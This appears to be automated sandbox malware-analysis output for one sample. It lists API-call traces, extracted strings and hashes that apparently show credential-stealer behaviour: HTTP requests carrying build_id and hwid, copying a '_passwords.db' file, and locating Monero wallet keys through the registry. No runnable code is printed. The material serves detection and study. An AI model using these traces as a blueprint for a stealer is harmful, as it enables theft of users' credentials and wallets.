Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$Heap$HttpProcessmemcpy$AllocateBinaryCloseCryptFileHandleOpenReadRequestStringlstrcat$ConnectCrackExitInfoOptionQuerySendSleep
String ID: ------$"$--$------$block$build_id$file_data
API String ID: 2371931802-3773912656
Opcode ID: e6b27f7c5fb395c915c855a183409fb9bed813d943871a9821f556bd1914e2b2
Instruction ID: 8ef9556bcb9b27fc7718986cd64f5425e1259ef4970f3e192c21128dbb4bf585
Opcode Fuzzy Hash: e6b27f7c5fb395c915c855a183409fb9bed813d943871a9821f556bd1914e2b2
Instruction Fuzzy Hash: 974295F4A001185BDB06BF628C56AFE7A6AAF81749F00542EF405672D2CF3C5F858BD9

Function 00407D9E Relevance: 60.2, APIs: 30, Strings: 4, Instructions: 686
networkmemorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763

Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004073C4,?), ref: 00406C13
Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00406C1F
Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?), ref: 00406C2B
Part of subcall function 00406BE0: lstrlenA.KERNEL32(00000000,?,?,?), ref: 00406C4A
Part of subcall function 00406BE0: InternetCrackUrlA.WININET(00000000,00000000,00000000), ref: 00406C5A

Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732

InternetOpenA.WININET(?,?,?,?,?), ref: 00407E29
StrCmpCA.SHLWAPI(?,?,?,?,?,?), ref: 00407E36
InternetConnectA.WININET ref: 00407FDC
HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040801D
lstrlenA.KERNEL32(00000000,?,?,?,?,?,",?,?,mode,?,?,?,?,00633851,?), ref: 00408396
lstrlenA.KERNEL32(00000000), ref: 004083A9
GetProcessHeap.KERNEL32 ref: 004083B5
HeapAlloc.KERNEL32(00000000,00000000,00000000), ref: 004083C2
lstrlenA.KERNEL32(00000000), ref: 004083E7
memcpy.MSVCRT(00000000,00000000,00000000), ref: 004083EC
lstrlenA.KERNEL32(00000000,?,?,?,?,?,00633851,?,?,?,?,00000014,?,?), ref: 00408403
lstrlenA.KERNEL32(00000000,?,?,?,?,?,00633851,?,?,?,?,00000014,?,?), ref: 00408425
memcpy.MSVCRT(00000000,00000000,00000000,?,?,?,?,?,00633851,?,?,?,?,00000014,?,?), ref: 0040842A
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00633851,?,?,?,?,00000014), ref: 0040844D
Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,?,00633851,?,?,?,?,00000014), ref: 00408475
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00633851,?,?,?,?,00000014), ref: 0040849A
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00633851,?,?,?,?), ref: 004084A4
InternetCloseHandle.WININET(?), ref: 004084AD
InternetCloseHandle.WININET(?), ref: 004084B6
InternetCloseHandle.WININET(?), ref: 004084BF
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00633851,?,?,?,?,00000014), ref: 00408512
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00633851,?,?,?,?), ref: 0040851C
InternetReadFile.WININET(?,?,000000C7,?), ref: 00408531
InternetReadFile.WININET(?,00000000,000000C7,?), ref: 0040857B
InternetCloseHandle.WININET(?), ref: 0040858F
InternetSetOptionA.WININET(?,0000001F,?,00000004), ref: 00408045

Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA

InternetCloseHandle.WININET(00000000), ref: 0040859F
InternetCloseHandle.WININET(00000000), ref: 004085A6
GetProcessHeap.KERNEL32(?,?,?,0042EEFC,00000000,?,?,?,?,?,?,?), ref: 00408602
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 00408611

Part of subcall function 004148F3: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042EEFC,00407497,?,00000014), ref: 00414960
Part of subcall function 004148F3: lstrlenA.KERNEL32(00000000), ref: 004149BE

Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850

Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8

Strings

mode, xrefs: 00408337
build_id, xrefs: 00408225, 0040823D
------, xrefs: 00407EE8, 00408083, 004081AA, 004082AA
", xrefs: 00408153, 00408259, 00408353

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: Internet$lstrlen$Heap$CloseHandle$lstrcpy$Process$Free$FileOpenReadlstrcatmemcpy$AllocConnectCrackHttpOptionRequestSleepSystemTime
String ID: "$------$build_id$mode
API String ID: 2829941862-3829489455
Opcode ID: b6ac0e4d20e8280c00ee4a52078a176f0a01ba546a3fa830e67fac002179915b
Instruction ID: c4bafd15bbe72c7753f75c76ce33fb2b6cfcd0d70a8ce77783aecb50f14d315a
Opcode Fuzzy Hash: b6ac0e4d20e8280c00ee4a52078a176f0a01ba546a3fa830e67fac002179915b
Instruction Fuzzy Hash: 5932A5F4A002185BCB15BF729C56AEF7B6BAF81745F00541EF416672D2CE3C9A448BE8

Function 0040B4F3 Relevance: 35.3, APIs: 19, Strings: 1, Instructions: 269
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732

Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA

Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040B5BB
Sleep.KERNEL32(000003E8,?), ref: 0040B5DE
PathFileExistsA.SHLWAPI(00000000), ref: 0040B5FC
CreateFileA.KERNEL32 ref: 0040B634
GetFileSize.KERNEL32(00000000,00000000), ref: 0040B64B
GetProcessHeap.KERNEL32 ref: 0040B665
ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040B68A
CloseHandle.KERNEL32(00000000), ref: 0040B6A8
GetProcessHeap.KERNEL32 ref: 0040B6B4
RtlAllocateHeap.NTDLL(00000000,00000000,000F423F), ref: 0040B6C2
lstrcatA.KERNEL32(00000000,00000000), ref: 0040B6D6
lstrcatA.KERNEL32(00000000,00000000), ref: 0040B70E
GetProcessHeap.KERNEL32(?,?,?,?,00000000), ref: 0040B7DE
HeapFree.KERNEL32(00000000,00000000,?), ref: 0040B7E9
GetProcessHeap.KERNEL32 ref: 0040B7F1
RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 0040B7FC
DeleteFileA.KERNEL32(00000000), ref: 0040B80F
GetProcessHeap.KERNEL32 ref: 0040B8E1
CloseHandle.KERNEL32(00000000), ref: 0040B8EF

Strings

_passwords.db, xrefs: 0040B726, 0040B748

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: Heap$File$Process$lstrcat$lstrcpy$CloseFreeHandle$AllocateCopyCreateDeleteExistsPathReadSizeSleeplstrlen
String ID: _passwords.db
API String ID: 3175396866-1485422284
Opcode ID: 451730505287d6db03fb216a09e53d2cbc0227b1ae60e765f92cb8950668dff5
Instruction ID: dd26fa20e6740df926561d89e38a7e43f5c20e24c5d15dedf75b600327ce6420
Opcode Fuzzy Hash: 451730505287d6db03fb216a09e53d2cbc0227b1ae60e765f92cb8950668dff5
Instruction Fuzzy Hash: E5A1A5B59002199BCB01FFB2DC46AEE7BB9FF45305F404019F811A7191DF78AA85CBA9

Function 0040B4F2 Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 308
memoryfilesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732

Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA

Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040B5BB
Sleep.KERNEL32(000003E8,?), ref: 0040B5DE
PathFileExistsA.SHLWAPI(00000000), ref: 0040B5FC
CreateFileA.KERNEL32 ref: 0040B634
GetFileSize.KERNEL32(00000000,00000000), ref: 0040B64B
GetProcessHeap.KERNEL32 ref: 0040B665
ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040B68A
CloseHandle.KERNEL32(00000000), ref: 0040B6A8
GetProcessHeap.KERNEL32 ref: 0040B6B4
RtlAllocateHeap.NTDLL(00000000,00000000,000F423F), ref: 0040B6C2
lstrcatA.KERNEL32(00000000,00000000), ref: 0040B6D6
lstrcatA.KERNEL32(00000000,00000000), ref: 0040B70E
GetProcessHeap.KERNEL32(?,?,?,?,00000000), ref: 0040B7DE
HeapFree.KERNEL32(00000000,00000000,?), ref: 0040B7E9
GetProcessHeap.KERNEL32 ref: 0040B7F1
RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 0040B7FC
DeleteFileA.KERNEL32(00000000), ref: 0040B80F
Sleep.KERNEL32(000003E8), ref: 0040B82D

Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763

GetProcessHeap.KERNEL32 ref: 0040B8E1
CloseHandle.KERNEL32(00000000), ref: 0040B8EF

Strings

_passwords.db, xrefs: 0040B726, 0040B748

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: Heap$File$Process$lstrcatlstrcpy$CloseFreeHandleSleep$AllocateCopyCreateDeleteExistsPathReadSizelstrlen
String ID: _passwords.db
API String ID: 102524898-1485422284
Opcode ID: bfb6670bb488a4770a93aa756208dad1c1f5594deac4f8315849cb1c44d8c299
Instruction ID: c2ce34365f7a7f117e03430e8c543a584d37913e59bd2e1ff373fdd8620fef08
Opcode Fuzzy Hash: bfb6670bb488a4770a93aa756208dad1c1f5594deac4f8315849cb1c44d8c299
Instruction Fuzzy Hash: 37C1C5B59006099BCB01EF71CC46AEEB7B9FF55308F008119F81567191EF78AB89CB98

Function 00406C70 Relevance: 30.3, APIs: 13, Strings: 4, Instructions: 523
networkfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763

Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004073C4,?), ref: 00406C13
Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00406C1F
Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?), ref: 00406C2B
Part of subcall function 00406BE0: lstrlenA.KERNEL32(00000000,?,?,?), ref: 00406C4A
Part of subcall function 00406BE0: InternetCrackUrlA.WININET(00000000,00000000,00000000), ref: 00406C5A

Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732

InternetOpenA.WININET(?,?,?,?,?), ref: 00406CFD
StrCmpCA.SHLWAPI(?,?,?,?,?,?), ref: 00406D10
InternetCloseHandle.WININET(00000000), ref: 004072FC

Part of subcall function 004148F3: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042EEFC,00407497,?,00000014), ref: 00414960
Part of subcall function 004148F3: lstrlenA.KERNEL32(00000000), ref: 004149BE

Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850

Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8

InternetConnectA.WININET ref: 00406EB4
HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00406EF2
InternetSetOptionA.WININET(?,0000001F,?,00000004), ref: 00406F24

Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA

lstrlenA.KERNEL32(00000000,?,?,?,?,?,0042EEFC,?,?,?,?,?,",?,?,build_id), ref: 004071DE
lstrlenA.KERNEL32(00000000), ref: 004071FB
Sleep.KERNEL32(00000BB8), ref: 0040721E
InternetReadFile.WININET(?,?,000007CF,?), ref: 00407285
InternetReadFile.WININET(?,?,000007CF,?), ref: 004072C9
InternetCloseHandle.WININET(?), ref: 004072DD
InternetCloseHandle.WININET(00000000), ref: 004072F5

Strings

build_id, xrefs: 0040711A, 00407132
------, xrefs: 00406DC2, 00406F5C, 0040709D
hwid, xrefs: 0040700A
", xrefs: 00407049, 0040714E

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpylstrlen$CloseHandle$FileOpenReadlstrcat$ConnectCrackHttpOptionRequestSleepSystemTime
String ID: "$------$build_id$hwid
API String ID: 3613725345-50533134
Opcode ID: a226ba48a9e1850e57829bd3354a094638608d2c18dede2ad7c7ec5fa795f12b
Instruction ID: 0de5520962e200c6a25ed7e72827b66a405d0f47db110f2e63ec7661919d4967
Opcode Fuzzy Hash: a226ba48a9e1850e57829bd3354a094638608d2c18dede2ad7c7ec5fa795f12b
Instruction Fuzzy Hash: 8502C4B4A001185ADB06BF628C95AFF7BBBAB81B49F00401EF416672D1CF3C5A85CBD5

Function 00408807 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 199
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763

Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004073C4,?), ref: 00406C13
Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00406C1F
Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?), ref: 00406C2B
Part of subcall function 00406BE0: lstrlenA.KERNEL32(00000000,?,?,?), ref: 00406C4A
Part of subcall function 00406BE0: InternetCrackUrlA.WININET(00000000,00000000,00000000), ref: 00406C5A

Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732

InternetOpenA.WININET ref: 0040886C
StrCmpCA.SHLWAPI(?), ref: 00408883
InternetConnectA.WININET ref: 004088BC
HttpOpenRequestA.WININET(00000000,GET,?,00633770,00000000,00000000,00000000,00000000), ref: 00408914
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00408934
HttpSendRequestA.WININET ref: 00408948
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00408960
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00408998
InternetCloseHandle.WININET(00000000), ref: 00408A2E
InternetCloseHandle.WININET(00000000), ref: 00408A9C

Strings

GET, xrefs: 0040890E
p7c, xrefs: 004088E3

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: Internet$Http$CloseHandleOpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: GET$p7c
API String ID: 1693188093-2983962290
Opcode ID: 320e718f7c480985df757210cfd3bb067cc0db8a6482ef72f91870b1b89151d2
Instruction ID: cd878151b0f7b65b431806c7ff5f9c38d997bf391b335ef2749d71c6156296e3
Opcode Fuzzy Hash: 320e718f7c480985df757210cfd3bb067cc0db8a6482ef72f91870b1b89151d2
Instruction Fuzzy Hash: 8371E3B1A002199FDB10EF61DC45BFEBBB9AF84304F00512EF8456B2D1DB789A85CB95

Function 004014C8 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 246
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004014E2
lstrcatA.KERNEL32(?,00000000), ref: 0040157E
lstrlenA.KERNEL32(?), ref: 00401581
CopyFileA.KERNEL32(?,00000000,00000001), ref: 0040170F
DeleteFileA.KERNEL32(00000000,?), ref: 004017D8

Strings

\Monero\wallet.keys, xrefs: 00401634
SOFTWARE\monero-project\monero-core, xrefs: 0040156D
wallet_path, xrefs: 0040154C, 00401568
wallet_p, xrefs: 00401544
.keys, xrefs: 0040159E, 004015B8

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
